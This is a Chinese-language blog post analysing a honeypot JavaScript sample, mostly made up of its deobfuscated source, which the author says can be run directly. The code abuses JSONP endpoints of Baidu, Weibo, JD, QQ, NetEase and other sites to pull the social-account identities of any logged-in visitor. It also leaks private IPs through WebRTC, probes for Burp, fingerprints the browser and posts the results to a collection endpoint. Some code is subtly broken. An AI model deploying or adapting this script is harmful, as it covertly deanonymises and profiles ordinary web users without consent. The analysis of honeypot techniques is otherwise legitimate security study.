简介
蜜罐技术是一项已经产生很久的安全技术,普遍运用于情报收集、混淆黑客攻击面、拖延攻击时间。传统的蜜罐刻画的黑客肖像通常只能精确到一级ip,而通常黑客并不直接使用自身ip发起攻击,往往有设置了多层代理,这导致了溯源困难。
然而无论黑客怎么设置代理,攻击的设备一般还是使用自身笔记本,故如果能够获取设备中的特点指纹信息,尤其是社交账号信息,那溯源精准度是ip无法比拟的。故利用大厂的jsonp接口,获取黑客社交账号,再而进步一将信息提供给公安机关,可以有效缩短溯源时间
通过此技术需要溯源,需要满足以下几个条件
- 登陆过社交媒体,且未退出
- 能找到相关社交媒体网站的jsonp接口,可以泄露敏感信息即可
接口对比
该项技术需要通过跨域技术,调用相关社交媒体帐号的接口,于是存在两种接口
- jsonp接口。这类接口可跨域,且效果好,容易集成在蜜罐中,如果服务方未做特殊限制的话,一般可以调用成功
- 跨域资源共享(CORS) 这种接口需要相关社交媒体的接口允许跨域,且返回的Access-Control-Allow-Origin为
*
,才可以跨域调用。但是却又无法携带cookie。因为浏览器跨域原因,该类接口无法作为收集黑客信息使用
cors接口获取bduss信息,失败截图
样本分析
有幸在论坛中找到一个蜜罐样本,所以分析一下
该js样本混淆不是很强。只是单纯替换变量名,我们直接还原即可。以下只提供还原后的代码
获取攻击人员ip地址
获取黑客的ip地址,分别通过webrtc与淘宝接口。但是在最新版的浏览器中,webrtc因为隐私问题,已经被浏览器禁止通过该接口获取用户ip。淘宝接口从浏览器端调用该接口的话,获取的ip准确度较高
callJSONP("https://www.taobao.com/help/getip.php", 'cb',
function(_0xd31803) {
sendData["network"]["externalIP"] = _0xd31803['ip'];
});
function getPrivateIP() {
var _0x410a6f;
window['RTCPeerConnection'] = window["RTCPeerConnection"] || window["mozRTCPeerConnection"] || window["webkitRTCPeerConnection"];
var _0x38415d = new RTCPeerConnection({
'iceServers': []
}),
_0xb15922 = function() {};
_0x38415d["createDataChannel"]('');
_0x38415d["createOffer"](_0x38415d['setLocalDescription'][a0_0x2f25('0x31')](_0x38415d), _0xb15922);
_0x38415d["onicecandidate"] = function(_0x5917f2) {
if (!_0x5917f2 || !_0x5917f2["candidate"] || !_0x5917f2["candidate"]["candidate"]) return;
_0x410a6f = /([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/ ["exec"](_0x5917f2["candidate"]["candidate"])[0x1];
_0x38415d["onicecandidate"] = _0xb15922;
};
var _0x2b51c1 = new Promise(function(_0x38c572, _0x3b13dc) {
setTimeout(() = >{
_0x38c572(_0x410a6f);
},
0x4b0);
});
return _0x2b51c1;
}
获取burp信息
function getToolInfo() {
const _0x53a902 = {};
var _0x236306 = new Image();
_0x236306['onload'] = function() {
_0x53a902['burpDet'] = true;
sendData['tool'] = _0x53a902;
};
_0x236306["onerror"] = function(_0x152b0b) {
_0x53a902["burpDet"] = ![];
sendData["tool"] = _0x53a902;
};
_0x236306["src"] = "http://burp/favicon.ico";
}
调用fingerprint库,获取指纹
这个库其实没有太多用,样本中很大一部分代码都是该库的代码
function getFpHash(_0x48e364) {
const _0x20846d = _0x48e364["map"](function(_0x260019) {
return _0x260019["value"];
});
return Fingerprint2["a0_0x2f25('0x50')"](_0x20846d["join"](''), 0x1f);
}
社交媒体
重点在getSocialInfo函数,根据接口,调用jsonp分别获取用户的社交媒体相关信息,以下我单独抠出来了,可以直接运行
const version = '1.0';
function callJSONP(jsonp_url, jsonp_param, callback_func) {
const _0x2482f8 = "jQuery" + (version + Math["random"]())["replace"](/D/g, '') + new Date()["getTime"]();
function _0x4923ad(_0x2d9f6b, _0x11ecab) {
window[_0x2d9f6b] = _0x11ecab;
}
function _0x156417(jsonp_url, jsonp_param, callback_func) {
var _0x340b9a = document['createElement']('a');
_0x340b9a["href"] = jsonp_url;
if (_0x340b9a["search"]['length']) {
return jsonp_url + '&' + jsonp_param + '=' + callback_func;
}
return jsonp_url + '?' + jsonp_param + '=' + callback_func;
}
_0x4923ad(_0x2482f8, callback_func);
jsonp_url = _0x156417(jsonp_url, jsonp_param, _0x2482f8);
loadJS(jsonp_url);
}
function loadJS(_0x51fe15) {
var _0x2555d3 = document["createElement"]('script');
_0x2555d3["src"] = _0x51fe15;
_0x2555d3['async'] = true;
document["body"]["appendChild"](_0x2555d3);
}
callJSONP("http://comment.api.163.com/api/v1/products/a2869674571f77b5a…db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121", "callback",
function(_0xa8b1cd) {
console.log(_0xa8b1cd)
});
在这里一共出现了很多jsonp接口,可能因为时间问题,很多接口目前已经无法继续使用
'https://baike.baidu.com/api/usercenter/login?msg=1&_=1560425055850'
'https://www.taobao.com/help/getip.php'
'http://pv.sohu.com/cityjson?ie=utf-8'
'https://api.m.jd.com/api?appid=pc_home_page&functionId=getBaseUserInfo&loginType=3'
'https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11'
'https://employer.58.com/index/enterpriseinfo'
'http://api.t.sina.com.cn/account/verify_credentials.json?source=27457034'
'https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B%22module%22%3A%22Base.VideoFeedsUrlServer%22%2C%22method%22%3A%22GetVideoFeedsUrl%22%2C%22param%22%3A%7B%22fileid%22%3A%220_11_013ee9171515dd784f7988b354084cf1a294299e.zip%22%7D%7D%2C%22DB%22%3A%7B%22module%22%3A%22ScoreCenter.ScoreCenterEx%22%2C%22method%22%3A%22free_login%22%2C%22param%22%3A%7B%22test%22%3A0%2C%22redirect%22%3A%22https%3A%2F%2Factivity.m.duiba.com.cn%2Fsubpage%2Findex%3FskinId%3D1049%22%2C%22activeId%22%3A0%2C%22activeType%22%3A%22%22%7D%7D%2C%22A%22%3A%7B%22module%22%3A%22CDN.SrfCdnDispatchServer%22%2C%22method%22%3A%22GetCdnDispatch%22%2C%22param%22%3A%7B%22guid%22%3A%22MS%22%7D%7D%2C%22B%22%3A%7B%22module%22%3A%22VipActivity.AwardPay%22%2C%22method%22%3A%22GetPayRank%22%2C%22param%22%3A%7B%22actid%22%3A%22D8D2CAAC126AE8FB%22%2C%22pagesize%22%3A0%7D%7D%2C%22C%22%3A%7B%22module%22%3A%22login.BasicinfoServer%22%2C%22method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D'
'https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)'
'http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121'
'http://message.dangdang.com/api/msg_detail.php?customer_id=o4P00TweebicwjhS72NWew%3D%3D&data_type=jsonp&pageindex=1&module=1&pagesize=10&_=1596772198527'
"https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11"
附跨域利用微博接口获取用户信息截图
最终通过reportInfo函数,发送给蜜罐做溯源分析
function reportInfo(_0x40eee1) {
const _0x56bbdc = "/api/portrait";
const _0x279db4 = new XMLHttpRequest();
_0x279db4['open']("POST", _0x56bbdc, true);
_0x279db4["setRequestHeader"]("Content-Type", "application/json");
_0x40eee1 = JSON["stringify"](_0x40eee1);
_0x279db4["send"](_0x40eee1);
}
附核心代码
var a0_0x2fc9 = ['displayName', 'replace', 'http://burp/favicon.ico', 'isAuthenticated', 'href', 'key', 'setRequestHeader', 'onicecandidate', 'publicIP', 'search', 'avatar_hd', 'https://baike.baidu.com/api/usercenter/login?msg=1&_=1560425055850', 'webkitRTCPeerConnection', 'network', 'POST', '/api/portrait', 'callback', 'https://www.taobao.com/help/getip.php', 'email', 'jsonp', 'tool', 'bind', 'cip', 'username', 'http://pv.sohu.com/cityjson?ie=utf-8', 'candidate', 'RTCPeerConnection', 'data', 'uin', 'createOffer', 'sina', 'murmur', 'join', 'exec', 'iqiyi', 'user', 'https://api.m.jd.com/api?appid=pc_home_page&functionId=getBaseUserInfo&loginType=3', 'isLogin', 'then', 'map', 'push', 'extraInfo', 'queryInfo', 'netease', 'https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11', 'headImg', 'onerror', 'https://employer.58.com/index/enterpriseinfo', 'body', 'privateIP', 'createElement', 'random', 'x64hash128', 'http://api.t.sina.com.cn/account/verify_credentials.json?source=27457034', 'returnObj', 'externalIP', 'src', 'screen_name', 'mozRTCPeerConnection', 'https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B%22module%22%3A%22Base.VideoFeedsUrlServer%22%2C%22method%22%3A%22GetVideoFeedsUrl%22%2C%22param%22%3A%7B%22fileid%22%3A%220_11_013ee9171515dd784f7988b354084cf1a294299e.zip%22%7D%7D%2C%22DB%22%3A%7B%22module%22%3A%22ScoreCenter.ScoreCenterEx%22%2C%22method%22%3A%22free_login%22%2C%22param%22%3A%7B%22test%22%3A0%2C%22redirect%22%3A%22https%3A%2F%2Factivity.m.duiba.com.cn%2Fsubpage%2Findex%3FskinId%3D1049%22%2C%22activeId%22%3A0%2C%22activeType%22%3A%22%22%7D%7D%2C%22A%22%3A%7B%22module%22%3A%22CDN.SrfCdnDispatchServer%22%2C%22method%22%3A%22GetCdnDispatch%22%2C%22param%22%3A%7B%22guid%22%3A%22MS%22%7D%7D%2C%22B%22%3A%7B%22module%22%3A%22VipActivity.AwardPay%22%2C%22method%22%3A%22GetPayRank%22%2C%22param%22%3A%7B%22actid%22%3A%22D8D2CAAC126AE8FB%22%2C%22pagesize%22%3A0%7D%7D%2C%22C%22%3A%7B%22module%22%3A%22login.BasicinfoServer%22%2C%22method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D', 'stringify', 'avatar', 'get', 'Content-Type', 'application/json', 'social', 'value', 'getTime', 'jdScore', 'rankinfo', 'uid', 'toString', 'send', 'jQuery', 'split', 'createDataChannel', 'appendChild', 'https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)', 'http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121', 'uname', 'baidu', 'name', 'burpDet']; (function(_0x3095b6, _0x2fc9a8) {
var _0x2f254b = function(_0x4dc742) {
while (--_0x4dc742) {
_0x3095b6['push'](_0x3095b6['shift']());
}
};
_0x2f254b(++_0x2fc9a8);
} (a0_0x2fc9, 0x130));
var a0_0x2f25 = function(_0x3095b6, _0x2fc9a8) {
_0x3095b6 = _0x3095b6 - 0x0;
var _0x2f254b = a0_0x2fc9[_0x3095b6];
return _0x2f254b;
};
const version = '1.0';
var sendData = {};
var fpData = {};
var fpOptions = {
'fonts': {},
'excludes': {
'enumerateDevices': true,
'pixelRatio': true
}
};
function loadJS(_0x51fe15) {
var _0x2555d3 = document["createElement"]('script');
_0x2555d3["src"] = _0x51fe15;
_0x2555d3['async'] = true;
document["body"]["appendChild"](_0x2555d3);
}
function reportInfo(_0x40eee1) {
const _0x56bbdc = "/api/portrait";
const _0x279db4 = new XMLHttpRequest();
_0x279db4['open']("POST", _0x56bbdc, true);
_0x279db4["setRequestHeader"]("Content-Type", "application/json");
_0x40eee1 = JSON["stringify"](_0x40eee1);
_0x279db4["send"](_0x40eee1);
}
function getPrivateIP() {
var _0x410a6f;
window['RTCPeerConnection'] = window["RTCPeerConnection"] || window["mozRTCPeerConnection"] || window["webkitRTCPeerConnection"];
var _0x38415d = new RTCPeerConnection({
'iceServers': []
}),
_0xb15922 = function() {};
_0x38415d["createDataChannel"]('');
_0x38415d["createOffer"](_0x38415d['setLocalDescription'][a0_0x2f25('0x31')](_0x38415d), _0xb15922);
_0x38415d["onicecandidate"] = function(_0x5917f2) {
if (!_0x5917f2 || !_0x5917f2["candidate"] || !_0x5917f2["candidate"]["candidate"]) return;
_0x410a6f = /([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/ ["exec"](_0x5917f2["candidate"]["candidate"])[0x1];
_0x38415d["onicecandidate"] = _0xb15922;
};
var _0x2b51c1 = new Promise(function(_0x38c572, _0x3b13dc) {
setTimeout(() = >{
_0x38c572(_0x410a6f);
},
0x4b0);
});
return _0x2b51c1;
}
function getNetworkInfo() {
const _0x34e9f0 = {};
_0x34e9f0["publicIP"] = returnCitySN && returnCitySN["cip"];
var _0x15270f = new Promise(function(_0x49a064, _0x1c5cad) {
_0x49a064(_0x34e9f0);
});
return _0x15270f;
}
function getToolInfo() {
const _0x53a902 = {};
var _0x236306 = new Image();
_0x236306['onload'] = function() {
_0x53a902['burpDet'] = true;
sendData['tool'] = _0x53a902;
};
_0x236306["onerror"] = function(_0x152b0b) {
_0x53a902["burpDet"] = ![];
sendData["tool"] = _0x53a902;
};
_0x236306["src"] = "http://burp/favicon.ico";
}
function getFpHash(_0x48e364) {
const _0x20846d = _0x48e364["map"](function(_0x260019) {
return _0x260019["value"];
});
return Fingerprint2["x64hash128"](_0x20846d["join"](''), 0x1f);
}
function getSocialInfo() {
var _0x166b4e = [];
callJSONP("https://baike.baidu.com/api/usercenter/login?msg=1&_=1560425055850", "callback",
function(_0x44f603) {
var _0x21beb2 = {
'channel': "baidu",
'extraInfo': {}
};
if (_0x44f603["isLogin"]) {
if (_0x44f603['uid']) {
_0x21beb2['uid'] = _0x44f603["uid"]['toString']();
}
if (_0x44f603["displayName"]) {
_0x21beb2["name"] = _0x44f603['displayName'];
}
if (_0x44f603["uname"]) {
_0x21beb2["name"] = _0x44f603['uname'];
_0x21beb2["uname"] = _0x44f603["uname"];
}
if (_0x44f603['portraitUrl']) {
_0x21beb2["avatar"] = _0x44f603['portraitUrl'];
}
_0x166b4e["push"](_0x21beb2);
}
});
callJSONP(a0_0x2f25('0x4b'), "callback",
function(_0x113e4f) {
var _0x434078 = {
'channel': '58',
'extraInfo': {}
};
_0x113e4f = _0x113e4f['data'];
if (_0x113e4f['username']) {
_0x434078["uname"] = _0x113e4f[a0_0x2f25('0x33')];
_0x166b4e["push"](_0x434078);
}
});
callJSONP("http://api.t.sina.com.cn/account/verify_credentials.json?source=27457034", "callback",
function(_0xa8b1cd) {
console.log(_0xa8b1cd)
var _0x51ee5f = {
'channel': 'weibo',
'extraInfo': {}
};
if (_0xa8b1cd['data']) {
_0xa8b1cd = _0xa8b1cd['data'];
if (_0xa8b1cd['id']) {
_0x51ee5f["uid"] = _0xa8b1cd['id']["toString"]();
if (_0xa8b1cd[a0_0x2f25('0x2')]) {
_0x51ee5f["name"] = _0xa8b1cd['screen_name'];
}
if (_0xa8b1cd["name"]) {
_0x51ee5f["name"] = _0xa8b1cd["name"];
}
if (_0xa8b1cd[a0_0x2f25('0x26')]) {
_0x51ee5f["avatar"] = _0xa8b1cd['avatar_hd'];
}
_0x166b4e["push"](_0x51ee5f);
}
}
});
callJSONP("https://api.m.jd.com/api?appid=pc_home_page&functionId=getBaseUserInfo&loginType=3", "jsonp",
function(_0xfbf730) {
var _0x5d43c8 = {
'channel': 'jd',
'extraInfo': {}
};
if (_0xfbf730[a0_0x2f25('0x52')]) {
_0xfbf730 = _0xfbf730[a0_0x2f25('0x52')];
if (_0xfbf730[a0_0x2f25('0x1f')] == 0x1) {
_0x5d43c8["name"] = _0xfbf730['userNickName'];
_0x5d43c8[a0_0x2f25('0x45')] = {
'jdScore': _0xfbf730[a0_0x2f25('0xd')],
'xbCreditScore': _0xfbf730['xbCreditScore']
};
if (_0xfbf730[a0_0x2f25('0x49')]) {
_0x5d43c8["avatar"] = _0xfbf730[a0_0x2f25('0x49')];
}
_0x166b4e["push"](_0x5d43c8);
}
}
});
callJSONP("https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)", "callback",
function(_0x4aac43) {
var _0x442377 = {
'channel': a0_0x2f25('0x3a'),
'extraInfo': {}
};
if (_0x4aac43["uid"]) {
_0x442377["uid"] = _0x4aac43["uid"]["toString"]();
_0x166b4e["push"](_0x442377);
}
});
callJSONP("http://comment.api.163.com/api/v1/products/a2869674571f77b5a…db5856/users/0/dailyAchv?ibc=newspc&from=all&_=1587352832121", 'callback',
function(_0x569fd6) {
var _0x16f4e7 = {
'channel': a0_0x2f25('0x47'),
'extraInfo': {}
};
if (_0x569fd6[a0_0x2f25('0x3f')]) {
_0x569fd6 = _0x569fd6[a0_0x2f25('0x3f')];
if (_0x569fd6['userId']) {
_0x16f4e7["uid"] = _0x569fd6['userId']['toString']();
}
if (_0x569fd6["avatar"]) {
_0x16f4e7["avatar"] = _0x569fd6['avatar'];
}
if (_0x569fd6[a0_0x2f25('0x33')]) {
_0x16f4e7["uname"] = atob(_0x569fd6['username']);
}
_0x166b4e['push'](_0x16f4e7);
}
});
callJSONP("https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B…method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D", "callback",
function(_0x14e20e) {
const _0x4fb80a = {
'channel': 'qq'
};
const _0x24eb14 = _0x14e20e['B'];
const _0x2d845f = _0x14e20e['C'];
if (_0x24eb14['data'] && _0x2d845f['data']) {
var _0x355a27 = ![];
const _0x41f36d = _0x24eb14["data"];
const _0x79742d = _0x2d845f["data"];
if (_0x41f36d && _0x41f36d[a0_0x2f25('0xe')] && _0x41f36d[a0_0x2f25('0xe')]['uin']) {
_0x4fb80a["uid"] = _0x41f36d[a0_0x2f25('0xe')][a0_0x2f25('0x38')]["toString"]();
_0x4fb80a["uname"] = _0x41f36d['rankinfo'][a0_0x2f25('0x38')]["toString"]();
_0x355a27 = true;
}
if (_0x79742d["name"]) {
_0x4fb80a["name"] = _0x79742d['name'];
_0x355a27 = true;
}
if (_0x355a27) {
_0x166b4e["push"](_0x4fb80a);
}
}
});
var _0x5f4ffa = {
'channel': "iqiyi",
'extraInfo': {}
};
if (cb_r0r7tg["uid"]) {
_0x5f4ffa['uid'] = cb_r0r7tg["uid"]["toString"]();
if (cb_r0r7tg["data"]) {}
_0x166b4e["push"](_0x5f4ffa);
}
callJSONP('http://message.dangdang.com/api/msg_detail.php?customer_id=o4P00TweebicwjhS72NWew%3D%3D&data_type=jsonp&pageindex=1&module=1&pagesize=10&_=1596772198527', 'callback',
function(_0x5f0be3) {
const _0xab7f14 = {
'channel': 'dangdang'
};
if (_0x5f0be3[a0_0x2f25('0x46')]) {
_0x5f0be3 = _0x5f0be3['queryInfo'];
if (_0x5f0be3['ddoy']) {
for (var _0x379720 of _0x5f0be3['ddoy'][a0_0x2f25('0x13')]('&')) {
paramSplit = _0x379720['split']('=');
if (paramSplit['length'] == 0x2) {
var _0x5dcb77 = paramSplit[0x0];
var _0x156e95 = paramSplit[0x1];
if (_0x5dcb77 == "uname" && _0x156e95) {
_0xab7f14["uname"] = _0x156e95;
} else if (_0x5dcb77 == a0_0x2f25('0x2e') && _0x156e95) {
_0xab7f14[a0_0x2f25('0x2e')] = _0x156e95;
}
_0x166b4e["push"](_0xab7f14);
}
}
}
}
});
var _0x2e1a87 = new Promise(function(_0x16e027, _0x5b0956) {
window['setTimeout'](function() {
_0x16e027(_0x166b4e);
},
0x4b0);
});
return _0x2e1a87;
}
function callJSONP(jsonp_url, jsonp_param, callback_func) {
const _0x2482f8 = "jQuery" + (version + Math["random"]())["replace"](/D/g, '') + new Date()["getTime"]();
function _0x4923ad(_0x2d9f6b, _0x11ecab) {
window[_0x2d9f6b] = _0x11ecab;
}
function _0x156417(jsonp_url, jsonp_param, callback_func) {
var _0x340b9a = document['createElement']('a');
_0x340b9a["href"] = jsonp_url;
if (_0x340b9a["search"]['length']) {
return jsonp_url + '&' + jsonp_param + '=' + callback_func;
}
return jsonp_url + '?' + jsonp_param + '=' + callback_func;
}
_0x4923ad(_0x2482f8, callback_func);
jsonp_url = _0x156417(jsonp_url, jsonp_param, _0x2482f8);
loadJS(jsonp_url);
}
function handleComponent(_0x3003a0) {
fpData["murmur"] = getFpHash(_0x3003a0);
for (var _0x48f6e6 in _0x3003a0) {
const _0x5e47d2 = _0x3003a0[_0x48f6e6];
const _0x1384f0 = _0x5e47d2["key"];
const _0x2bac91 = _0x5e47d2["value"];
fpData[_0x1384f0] = _0x2bac91;
}
sendData['browser'] = fpData;
getToolInfo();
getNetworkInfo()['then'](function(_0xcae004) {
callJSONP("https://www.taobao.com/help/getip.php", 'cb',
function(_0xd31803) {
sendData["network"]["externalIP"] = _0xd31803['ip'];
});
getPrivateIP()["then"](function(_0x17cdc5) {
sendData["network"]["privateIP"] = _0x17cdc5;
getSocialInfo()["then"](function(_0x33c15c) {
sendData[social] = _0x33c15c;
reportInfo(sendData);
});
});
});
}
loadJS("http://pv.sohu.com/cityjson?ie=utf-8");
loadJS("https://nl-rcd.iqiyi.com/apis/urc/getrc?agent_type=1&cb=cb_r0r7tg&ckuid=&dp=3&limit=5&only_long=1&terminalId=11");
if (window['requestIdleCallback']) {
requestIdleCallback(function() {
Fingerprint2['get'](fpOptions, handleComponent);
});
} else {
setTimeout(function() {
Fingerprint2[a0_0x2f25('0x7')](fpOptions, handleComponent);
},
0x1f4);
}